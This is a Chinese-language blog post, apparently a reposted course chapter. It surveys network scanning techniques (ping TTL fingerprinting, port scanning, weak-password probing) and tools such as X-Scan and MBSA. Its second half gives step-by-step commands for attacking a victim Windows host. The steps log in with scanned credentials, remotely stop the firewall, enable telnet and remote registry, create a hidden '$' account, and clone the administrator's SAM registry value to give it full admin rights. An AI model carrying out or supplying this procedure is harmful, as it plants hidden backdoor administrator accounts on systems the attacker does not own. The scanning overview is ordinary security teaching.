掃描技術和掃描工具

科技小先鋒發表於2017-11-30

第2章-掃描技術

一、掃描技術概述

描描指的是利用工具軟體來探測目標網路或主機的過程,其目的只有一個:為即將採取的攻擊或防禦行動收集情報

(1)、掃描原理

1、ping檢測

Øping命令是最常用的網路連線診斷工具,當然也可作為最基礎的掃描工具

Ø利生ICMP協議的響應機制,可以對目標IP地址、主機線上情況、作業系統型別等資訊作出初步判斷

【ping來判斷目標主機的作業系統情況】

a)TTL值趨近於128:windows XP/windows server 2000/windows server 2003

b)TTL值趨近於64 :windows 7/windows 2008

c)TTL值趨近於255:交換機、路由器等裝置

如下圖所示

124946212.jpg


2、埠掃描

Ø主要針對特定的網路服務進行探測,嘗試連線目標主機的特定埠,根據反饋結果來判斷是否開啟指定服務

Ø分類:TCP埠掃描、UDP埠掃描

【TCP埠掃描】

會向對方傳送一個請求或終止訪問的資料包,若對方給出正常回應,則表示目標服務開啟,否則表示埠關閉或可能被防火牆攔截

【UDP埠掃描】

通常會傳送一個空資料包,若反饋錯誤訊息,則表示目標服務開啟,否則會告知埠不可達

【命令格式】

   telnet ip地址埠號如“telnet  192.168.4.17 21”

如下圖所示

124957411.jpg


3、OS探測

Ø也就是作業系統(Operating System)探測,指的是獲取目標主機所使用的作業系統型別,版本等相關資訊的過程

Ø探測試式:隨便訪問一個不存在的網頁,通常能夠在出錯頁面上得到web服務程式的版本資訊

如下圖所示

125004795.jpg


4、弱口令探測

Ø弱口令探測的方式類似於暴力破解,只不過並不嘗試所有可能的密碼,而只是嘗試安全性極差的密碼,如“abc123、123456”等

5、漏洞評估

Ø漏洞評估(或稱弱點評估),一般用在正面的系統安全加固工作中,主要針對伺服器系統各種已知的漏洞進行檢測,同時對各種公認的或潛在的見險進行摸擬,從而全面判斷目標主機的安全性

Ø漏洞評估通常由一系列獨立的掃描外掛來執行,而並不是單一的掃描任務

(2)、常見的掃描工具

1、SuperScan

一款免費的TCP/UDP埠掃描工具,網址“www.foundstone.com”

2、Fluxay(流光)

由國內的“小榕軟體實驗室”開發的一款強大的整合掃描軟體,網址“www.netxeyes.com”

3、X-Scan

由國內的“安全焦點”出品的漏洞檢洞工具,網址“www.xfocus.net”

4、MBSA

   MBSA全稱“Microsoft BaselineSecurity Analyzer”微軟基準安全分析

器,由微軟公司開發的一款免費的作業系統安全評估工具,網址“www.microsoft.com”

5、Wikto

在Windows平臺執行的Web弱點掃描工具,採用C#語言編寫,網址

“www.sensepost.com”

二、建立隱藏使用者的方法

本案例是用在被攻擊者主機上建立,也可在自己的主機上建立


1、用掃描工具獲取到對方的賬戶和密碼

2、用獲取到的賬戶和密碼先進入系統(假如對方IP為192.168.10.10,掃描到的密碼為123456)

   net use \1962.168.10.10  /user:administrator 123456

3、遠端關閉對方的防火牆

   sc \192.168.10.10  stop  sharedaccess

4、遠端開啟對方的遠端服務

   sc \192.168.10.10  start  tlntsvr start= auto

   sc \192.168.10.10  start  tlntsvr

5、遠端開啟對方的登錄檔服務

   sc \192.168.10.10  config  remoteregistry  start= auto

   sc \192.168.10.10  start  remoteregistry

6、遠端登入系統

   telnet 192.168.10.10

7、建立隱藏使用者(假如取名為benet)

   net user  benet$  123456 /add

8、開啟本地登錄檔(regedit)

選擇“檔案”→→選擇”連線到網路登錄檔”→→輸入“對方IP:192.168.10.10”→→點選進入

9、賦予完全控制許可權並編輯登錄檔

   HKEY_LOCAL_MACHINE→SAM→SAM→Domain→Account

      users:許可權(F)、功能(V)在這個選項裡

      Names:賬戶在這個選項裡

把管理員許可權(ox1-F4)“0000001F4”複製給benet使用者(0x3eb)“0000003EB”

10、在匯出benet使用者的“Names”和“Users”

說白了就是做個備份,匯入位置隨便哪都行

11、遠端刪除benet使用者

   net user  benet$  /del

12、最後,在匯入剛才匯出的benet使用者

13、隱藏使用者建立成功


《注意》:如果是在本地建立的話,前面6步就可以省略,直接從第7步開始


本文轉自甘兵 51CTO部落格,原文連結:http://blog.51cto.com/ganbing/1258688,如需轉載請自行聯絡原作者


相關文章